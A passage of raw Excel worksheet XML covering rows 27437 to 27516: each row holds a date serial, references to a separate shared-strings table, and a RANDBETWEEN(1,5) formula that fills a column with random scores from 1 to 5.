        <v>4</v>
      </c>
    </row>
    <row r="27437" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27437" s="1">
        <v>42884.307638888888</v>
      </c>
      <c r="C27437" t="s">
        <v>344</v>
      </c>
      <c r="E27437" t="s">
        <v>24960</v>
      </c>
      <c r="F27437">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27438" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27438" s="1">
        <v>42884.284837962965</v>
      </c>
      <c r="C27438" t="s">
        <v>48</v>
      </c>
      <c r="E27438" s="2" t="s">
        <v>24961</v>
      </c>
      <c r="F27438">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27439" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27439" s="1">
        <v>42884.225173611114</v>
      </c>
      <c r="C27439" t="s">
        <v>60</v>
      </c>
      <c r="E27439" s="2" t="s">
        <v>24962</v>
      </c>
      <c r="F27439">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27440" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27440" s="1">
        <v>42884.166643518518</v>
      </c>
      <c r="C27440" t="s">
        <v>749</v>
      </c>
      <c r="E27440" s="2" t="s">
        <v>24963</v>
      </c>
      <c r="F27440">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27441" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A27441" s="1">
        <v>42884.118576388886</v>
      </c>
      <c r="C27441" t="s">
        <v>339</v>
      </c>
      <c r="E27441" s="2" t="s">
        <v>24964</v>
      </c>
      <c r="F27441">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27442" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27442" s="1">
        <v>42884.107673611114</v>
      </c>
      <c r="C27442" t="s">
        <v>71</v>
      </c>
      <c r="E27442" s="2" t="s">
        <v>24965</v>
      </c>
      <c r="F27442">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27443" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27443" s="1">
        <v>42884.100914351853</v>
      </c>
      <c r="C27443" t="s">
        <v>318</v>
      </c>
      <c r="E27443" s="2" t="s">
        <v>24966</v>
      </c>
      <c r="F27443">
        <f t="shared" ca="1" si="428"/>
        <v>5</v>
      </c>
    </row>
    <row r="27444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27444" s="1">
        <v>42884.084918981483</v>
      </c>
      <c r="C27444" t="s">
        <v>410</v>
      </c>
      <c r="E27444" t="s">
        <v>24967</v>
      </c>
      <c r="F27444">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27445" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27445" s="1">
        <v>42884.073530092595</v>
      </c>
      <c r="C27445" t="s">
        <v>41</v>
      </c>
      <c r="E27445" s="2" t="s">
        <v>24968</v>
      </c>
      <c r="F27445">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27446" s="1">
        <v>42883.995104166665</v>
      </c>
      <c r="C27446" t="s">
        <v>253</v>
      </c>
      <c r="E27446" t="s">
        <v>24969</v>
      </c>
      <c r="F27446">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27447" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27447" s="1">
        <v>42883.864675925928</v>
      </c>
      <c r="C27447" t="s">
        <v>140</v>
      </c>
      <c r="D27447" t="s">
        <v>847</v>
      </c>
      <c r="E27447" s="2" t="s">
        <v>24970</v>
      </c>
      <c r="F27447">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27448" s="1">
        <v>42883.692800925928</v>
      </c>
      <c r="C27448" t="s">
        <v>16</v>
      </c>
      <c r="E27448" t="s">
        <v>24971</v>
      </c>
      <c r="F27448">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27449" s="1">
        <v>42883.543506944443</v>
      </c>
      <c r="C27449" t="s">
        <v>97</v>
      </c>
      <c r="E27449" t="s">
        <v>24972</v>
      </c>
      <c r="F27449">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27450" s="1">
        <v>42883.543506944443</v>
      </c>
      <c r="C27450" t="s">
        <v>97</v>
      </c>
      <c r="E27450" t="s">
        <v>24972</v>
      </c>
      <c r="F27450">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27451" s="1">
        <v>42883.327951388892</v>
      </c>
      <c r="C27451" t="s">
        <v>1050</v>
      </c>
      <c r="E27451" t="s">
        <v>24973</v>
      </c>
      <c r="F27451">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27452" s="1">
        <v>42883.11577546296</v>
      </c>
      <c r="C27452" t="s">
        <v>144</v>
      </c>
      <c r="E27452" t="s">
        <v>24974</v>
      </c>
      <c r="F27452">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27453" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27453" s="1">
        <v>42883.078750000001</v>
      </c>
      <c r="C27453" t="s">
        <v>301</v>
      </c>
      <c r="E27453" s="2" t="s">
        <v>24975</v>
      </c>
      <c r="F27453">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27454" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27454" s="1">
        <v>42882.897766203707</v>
      </c>
      <c r="C27454" t="s">
        <v>10</v>
      </c>
      <c r="D27454" t="s">
        <v>271</v>
      </c>
      <c r="E27454" s="2" t="s">
        <v>24976</v>
      </c>
      <c r="F27454">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27455" s="1">
        <v>42882.619131944448</v>
      </c>
      <c r="C27455" t="s">
        <v>10</v>
      </c>
      <c r="D27455" t="s">
        <v>14</v>
      </c>
      <c r="F27455">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27456" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27456" s="1">
        <v>42882.275497685187</v>
      </c>
      <c r="C27456" t="s">
        <v>140</v>
      </c>
      <c r="D27456" t="s">
        <v>847</v>
      </c>
      <c r="E27456" s="2" t="s">
        <v>24977</v>
      </c>
      <c r="F27456">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27457" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A27457" s="1">
        <v>42882.227002314816</v>
      </c>
      <c r="C27457" t="s">
        <v>10</v>
      </c>
      <c r="D27457" t="s">
        <v>11</v>
      </c>
      <c r="E27457" s="2" t="s">
        <v>24978</v>
      </c>
      <c r="F27457">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27458" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27458" s="1">
        <v>42881.832071759258</v>
      </c>
      <c r="C27458" t="s">
        <v>10</v>
      </c>
      <c r="D27458" t="s">
        <v>6</v>
      </c>
      <c r="E27458" s="2" t="s">
        <v>24979</v>
      </c>
      <c r="F27458">
        <f t="shared" ref="F27458:F27521" ca="1" si="429">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="27459" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27459" s="1">
        <v>42881.74287037037</v>
      </c>
      <c r="C27459" t="s">
        <v>6</v>
      </c>
      <c r="D27459" t="s">
        <v>114</v>
      </c>
      <c r="E27459" s="2" t="s">
        <v>24980</v>
      </c>
      <c r="F27459">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27460" s="1">
        <v>42881.742534722223</v>
      </c>
      <c r="C27460" t="s">
        <v>318</v>
      </c>
      <c r="F27460">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27461" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27461" s="1">
        <v>42881.730138888888</v>
      </c>
      <c r="C27461" t="s">
        <v>10</v>
      </c>
      <c r="D27461" t="s">
        <v>86</v>
      </c>
      <c r="E27461" s="2" t="s">
        <v>24981</v>
      </c>
      <c r="F27461">
        <f t="shared" ca="1" si="429"/>
        <v>5</v>
      </c>
    </row>
    <row r="27462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27462" s="1">
        <v>42881.621898148151</v>
      </c>
      <c r="C27462" t="s">
        <v>10</v>
      </c>
      <c r="D27462" t="s">
        <v>6</v>
      </c>
      <c r="E27462" t="s">
        <v>24982</v>
      </c>
      <c r="F27462">
        <f t="shared" ca="1" si="429"/>
        <v>5</v>
      </c>
    </row>
    <row r="27463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27463" s="1">
        <v>42881.61519675926</v>
      </c>
      <c r="C27463" t="s">
        <v>10</v>
      </c>
      <c r="D27463" t="s">
        <v>36</v>
      </c>
      <c r="E27463" t="s">
        <v>24983</v>
      </c>
      <c r="F27463">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27464" s="1">
        <v>42881.595196759263</v>
      </c>
      <c r="C27464" t="s">
        <v>10</v>
      </c>
      <c r="D27464" t="s">
        <v>6</v>
      </c>
      <c r="E27464" t="s">
        <v>24984</v>
      </c>
      <c r="F27464">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27465" s="1">
        <v>42881.581226851849</v>
      </c>
      <c r="C27465" t="s">
        <v>10</v>
      </c>
      <c r="D27465" t="s">
        <v>251</v>
      </c>
      <c r="E27465" t="s">
        <v>24985</v>
      </c>
      <c r="F27465">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27466" s="1">
        <v>42881.579212962963</v>
      </c>
      <c r="C27466" t="s">
        <v>10</v>
      </c>
      <c r="D27466" t="s">
        <v>52</v>
      </c>
      <c r="E27466" t="s">
        <v>24986</v>
      </c>
      <c r="F27466">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27467" s="1">
        <v>42881.557939814818</v>
      </c>
      <c r="C27467" t="s">
        <v>6</v>
      </c>
      <c r="D27467" t="s">
        <v>25</v>
      </c>
      <c r="E27467" t="s">
        <v>828</v>
      </c>
      <c r="F27467">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27468" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27468" s="1">
        <v>42881.556932870371</v>
      </c>
      <c r="C27468" t="s">
        <v>10</v>
      </c>
      <c r="D27468" t="s">
        <v>374</v>
      </c>
      <c r="E27468" s="2" t="s">
        <v>24987</v>
      </c>
      <c r="F27468">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27469" s="1">
        <v>42881.550775462965</v>
      </c>
      <c r="C27469" t="s">
        <v>10</v>
      </c>
      <c r="D27469" t="s">
        <v>6</v>
      </c>
      <c r="E27469" t="s">
        <v>24988</v>
      </c>
      <c r="F27469">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27470" s="1">
        <v>42881.520254629628</v>
      </c>
      <c r="C27470" t="s">
        <v>10</v>
      </c>
      <c r="D27470" t="s">
        <v>263</v>
      </c>
      <c r="E27470" t="s">
        <v>24989</v>
      </c>
      <c r="F27470">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27471" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27471" s="1">
        <v>42881.511469907404</v>
      </c>
      <c r="C27471" t="s">
        <v>48</v>
      </c>
      <c r="E27471" s="2" t="s">
        <v>24990</v>
      </c>
      <c r="F27471">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27472" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A27472" s="1">
        <v>42881.500914351855</v>
      </c>
      <c r="C27472" t="s">
        <v>71</v>
      </c>
      <c r="E27472" s="2" t="s">
        <v>24991</v>
      </c>
      <c r="F27472">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27473" s="1">
        <v>42881.476388888892</v>
      </c>
      <c r="C27473" t="s">
        <v>41</v>
      </c>
      <c r="E27473" t="s">
        <v>24992</v>
      </c>
      <c r="F27473">
        <f t="shared" ca="1" si="429"/>
        <v>5</v>
      </c>
    </row>
    <row r="27474" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27474" s="1">
        <v>42881.47415509259</v>
      </c>
      <c r="C27474" t="s">
        <v>6</v>
      </c>
      <c r="D27474" t="s">
        <v>194</v>
      </c>
      <c r="E27474" t="s">
        <v>24993</v>
      </c>
      <c r="F27474">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27475" s="1">
        <v>42881.473298611112</v>
      </c>
      <c r="C27475" t="s">
        <v>344</v>
      </c>
      <c r="E27475" t="s">
        <v>24994</v>
      </c>
      <c r="F27475">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27476" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27476" s="1">
        <v>42881.471342592595</v>
      </c>
      <c r="C27476" t="s">
        <v>10</v>
      </c>
      <c r="D27476" t="s">
        <v>36</v>
      </c>
      <c r="E27476" s="2" t="s">
        <v>24995</v>
      </c>
      <c r="F27476">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27477" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27477" s="1">
        <v>42881.458969907406</v>
      </c>
      <c r="C27477" t="s">
        <v>6</v>
      </c>
      <c r="D27477" t="s">
        <v>25</v>
      </c>
      <c r="E27477" s="2" t="s">
        <v>24996</v>
      </c>
      <c r="F27477">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27478" s="1">
        <v>42881.406030092592</v>
      </c>
      <c r="C27478" t="s">
        <v>471</v>
      </c>
      <c r="E27478" t="s">
        <v>24997</v>
      </c>
      <c r="F27478">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27479" s="1">
        <v>42881.274016203701</v>
      </c>
      <c r="C27479" t="s">
        <v>41</v>
      </c>
      <c r="E27479" t="s">
        <v>24998</v>
      </c>
      <c r="F27479">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27480" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27480" s="1">
        <v>42881.20888888889</v>
      </c>
      <c r="C27480" t="s">
        <v>60</v>
      </c>
      <c r="E27480" t="s">
        <v>24999</v>
      </c>
      <c r="F27480">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27481" s="1">
        <v>42881.184247685182</v>
      </c>
      <c r="C27481" t="s">
        <v>314</v>
      </c>
      <c r="E27481" t="s">
        <v>25000</v>
      </c>
      <c r="F27481">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27482" s="1">
        <v>42881.169108796297</v>
      </c>
      <c r="C27482" t="s">
        <v>73</v>
      </c>
      <c r="E27482" t="s">
        <v>25001</v>
      </c>
      <c r="F27482">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27483" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A27483" s="1">
        <v>42881.157025462962</v>
      </c>
      <c r="C27483" t="s">
        <v>10</v>
      </c>
      <c r="D27483" t="s">
        <v>11</v>
      </c>
      <c r="E27483" s="2" t="s">
        <v>25002</v>
      </c>
      <c r="F27483">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27484" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27484" s="1">
        <v>42881.152384259258</v>
      </c>
      <c r="C27484" t="s">
        <v>71</v>
      </c>
      <c r="E27484" s="2" t="s">
        <v>25003</v>
      </c>
      <c r="F27484">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27485" s="1">
        <v>42881.136840277781</v>
      </c>
      <c r="C27485" t="s">
        <v>48</v>
      </c>
      <c r="E27485" t="s">
        <v>25004</v>
      </c>
      <c r="F27485">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27486" s="1">
        <v>42881.122731481482</v>
      </c>
      <c r="C27486" t="s">
        <v>2192</v>
      </c>
      <c r="E27486" t="s">
        <v>25005</v>
      </c>
      <c r="F27486">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27487" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27487" s="1">
        <v>42880.959062499998</v>
      </c>
      <c r="C27487" t="s">
        <v>408</v>
      </c>
      <c r="E27487" s="2" t="s">
        <v>25006</v>
      </c>
      <c r="F27487">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27488" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27488" s="1">
        <v>42880.841273148151</v>
      </c>
      <c r="C27488" t="s">
        <v>10</v>
      </c>
      <c r="D27488" t="s">
        <v>86</v>
      </c>
      <c r="E27488" s="2" t="s">
        <v>25007</v>
      </c>
      <c r="F27488">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27489" s="1">
        <v>42880.819756944446</v>
      </c>
      <c r="C27489" t="s">
        <v>10</v>
      </c>
      <c r="D27489" t="s">
        <v>6</v>
      </c>
      <c r="E27489" t="s">
        <v>25008</v>
      </c>
      <c r="F27489">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27490" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27490" s="1">
        <v>42880.758738425924</v>
      </c>
      <c r="C27490" t="s">
        <v>10</v>
      </c>
      <c r="D27490" t="s">
        <v>6</v>
      </c>
      <c r="E27490" s="2" t="s">
        <v>25009</v>
      </c>
      <c r="F27490">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27491" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27491" s="1">
        <v>42880.751064814816</v>
      </c>
      <c r="C27491" t="s">
        <v>16</v>
      </c>
      <c r="E27491" s="2" t="s">
        <v>25010</v>
      </c>
      <c r="F27491">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27492" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27492" s="1">
        <v>42880.712013888886</v>
      </c>
      <c r="C27492" t="s">
        <v>6</v>
      </c>
      <c r="D27492" t="s">
        <v>194</v>
      </c>
      <c r="E27492" s="2" t="s">
        <v>25011</v>
      </c>
      <c r="F27492">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27493" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27493" s="1">
        <v>42880.688090277778</v>
      </c>
      <c r="C27493" t="s">
        <v>6</v>
      </c>
      <c r="D27493" t="s">
        <v>194</v>
      </c>
      <c r="E27493" s="2" t="s">
        <v>25012</v>
      </c>
      <c r="F27493">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27494" s="1">
        <v>42880.680937500001</v>
      </c>
      <c r="C27494" t="s">
        <v>10</v>
      </c>
      <c r="D27494" t="s">
        <v>6</v>
      </c>
      <c r="E27494" t="s">
        <v>25013</v>
      </c>
      <c r="F27494">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27495" s="1">
        <v>42880.631724537037</v>
      </c>
      <c r="C27495" t="s">
        <v>10</v>
      </c>
      <c r="D27495" t="s">
        <v>107</v>
      </c>
      <c r="E27495" t="s">
        <v>25014</v>
      </c>
      <c r="F27495">
        <f t="shared" ca="1" si="429"/>
        <v>5</v>
      </c>
    </row>
    <row r="27496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27496" s="1">
        <v>42880.618171296293</v>
      </c>
      <c r="C27496" t="s">
        <v>10</v>
      </c>
      <c r="D27496" t="s">
        <v>89</v>
      </c>
      <c r="E27496" t="s">
        <v>25015</v>
      </c>
      <c r="F27496">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27497" s="1">
        <v>42880.59412037037</v>
      </c>
      <c r="C27497" t="s">
        <v>41</v>
      </c>
      <c r="E27497" t="s">
        <v>25016</v>
      </c>
      <c r="F27497">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27498" s="1">
        <v>42880.575844907406</v>
      </c>
      <c r="C27498" t="s">
        <v>10</v>
      </c>
      <c r="D27498" t="s">
        <v>89</v>
      </c>
      <c r="E27498" t="s">
        <v>25017</v>
      </c>
      <c r="F27498">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27499" s="1">
        <v>42880.509594907409</v>
      </c>
      <c r="C27499" t="s">
        <v>10</v>
      </c>
      <c r="D27499" t="s">
        <v>86</v>
      </c>
      <c r="E27499" t="s">
        <v>25018</v>
      </c>
      <c r="F27499">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27500" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27500" s="1">
        <v>42880.471307870372</v>
      </c>
      <c r="C27500" t="s">
        <v>17</v>
      </c>
      <c r="E27500" s="2" t="s">
        <v>25019</v>
      </c>
      <c r="F27500">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27501" s="1">
        <v>42880.448703703703</v>
      </c>
      <c r="C27501" t="s">
        <v>10</v>
      </c>
      <c r="D27501" t="s">
        <v>52</v>
      </c>
      <c r="E27501" t="s">
        <v>25020</v>
      </c>
      <c r="F27501">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27502" s="1">
        <v>42880.446944444448</v>
      </c>
      <c r="C27502" t="s">
        <v>10</v>
      </c>
      <c r="D27502" t="s">
        <v>86</v>
      </c>
      <c r="E27502" t="s">
        <v>25018</v>
      </c>
      <c r="F27502">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27503" s="1">
        <v>42880.438993055555</v>
      </c>
      <c r="C27503" t="s">
        <v>10</v>
      </c>
      <c r="D27503" t="s">
        <v>52</v>
      </c>
      <c r="E27503" t="s">
        <v>25021</v>
      </c>
      <c r="F27503">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27504" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27504" s="1">
        <v>42880.427546296298</v>
      </c>
      <c r="C27504" t="s">
        <v>6</v>
      </c>
      <c r="D27504" t="s">
        <v>25</v>
      </c>
      <c r="E27504" s="2" t="s">
        <v>25022</v>
      </c>
      <c r="F27504">
        <f t="shared" ca="1" si="429"/>
        <v>5</v>
      </c>
    </row>
    <row r="27505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27505" s="1">
        <v>42880.41265046296</v>
      </c>
      <c r="C27505" t="s">
        <v>10</v>
      </c>
      <c r="D27505" t="s">
        <v>151</v>
      </c>
      <c r="E27505" t="s">
        <v>25023</v>
      </c>
      <c r="F27505">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27506" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27506" s="1">
        <v>42880.397719907407</v>
      </c>
      <c r="C27506" t="s">
        <v>16</v>
      </c>
      <c r="E27506" s="2" t="s">
        <v>25024</v>
      </c>
      <c r="F27506">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27507" s="1">
        <v>42880.38</v>
      </c>
      <c r="C27507" t="s">
        <v>10</v>
      </c>
      <c r="D27507" t="s">
        <v>151</v>
      </c>
      <c r="E27507" t="s">
        <v>25025</v>
      </c>
      <c r="F27507">
        <f t="shared" ca="1" si="429"/>
        <v>4</v>
      </c>
    </row>
    <row r="27508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27508" s="1">
        <v>42880.35533564815</v>
      </c>
      <c r="C27508" t="s">
        <v>10</v>
      </c>
      <c r="D27508" t="s">
        <v>89</v>
      </c>
      <c r="E27508" t="s">
        <v>25026</v>
      </c>
      <c r="F27508">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27509" s="1">
        <v>42880.351886574077</v>
      </c>
      <c r="C27509" t="s">
        <v>344</v>
      </c>
      <c r="E27509" t="s">
        <v>25027</v>
      </c>
      <c r="F27509">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27510" s="1">
        <v>42880.348726851851</v>
      </c>
      <c r="C27510" t="s">
        <v>10375</v>
      </c>
      <c r="F27510">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27511" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27511" s="1">
        <v>42880.347037037034</v>
      </c>
      <c r="C27511" t="s">
        <v>10</v>
      </c>
      <c r="D27511" t="s">
        <v>36</v>
      </c>
      <c r="E27511" s="2" t="s">
        <v>25028</v>
      </c>
      <c r="F27511">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27512" s="1">
        <v>42880.335219907407</v>
      </c>
      <c r="C27512" t="s">
        <v>43</v>
      </c>
      <c r="E27512" t="s">
        <v>25029</v>
      </c>
      <c r="F27512">
        <f t="shared" ca="1" si="429"/>
        <v>2</v>
      </c>
    </row>
    <row r="27513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27513" s="1">
        <v>42880.266909722224</v>
      </c>
      <c r="C27513" t="s">
        <v>10</v>
      </c>
      <c r="D27513" t="s">
        <v>39</v>
      </c>
      <c r="F27513">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27514" s="1">
        <v>42880.21638888889</v>
      </c>
      <c r="C27514" t="s">
        <v>43</v>
      </c>
      <c r="E27514" t="s">
        <v>25030</v>
      </c>
      <c r="F27514">
        <f t="shared" ca="1" si="429"/>
        <v>1</v>
      </c>
    </row>
    <row r="27515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27515" s="1">
        <v>42880.168796296297</v>
      </c>
      <c r="C27515" t="s">
        <v>97</v>
      </c>
      <c r="E27515" t="s">
        <v>25031</v>
      </c>
      <c r="F27515">
        <f t="shared" ca="1" si="429"/>
        <v>3</v>
      </c>
    </row>
    <row r="27516" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27516" s="1">
        <v>42880.086527777778</v>
      </c>
      <c r="C27516" t="s">
        <v>471</v>
      </c>
      <c r="E27516" s="2" t="s">
        <v>25032</v>
      </c>
      <c r="F27516">
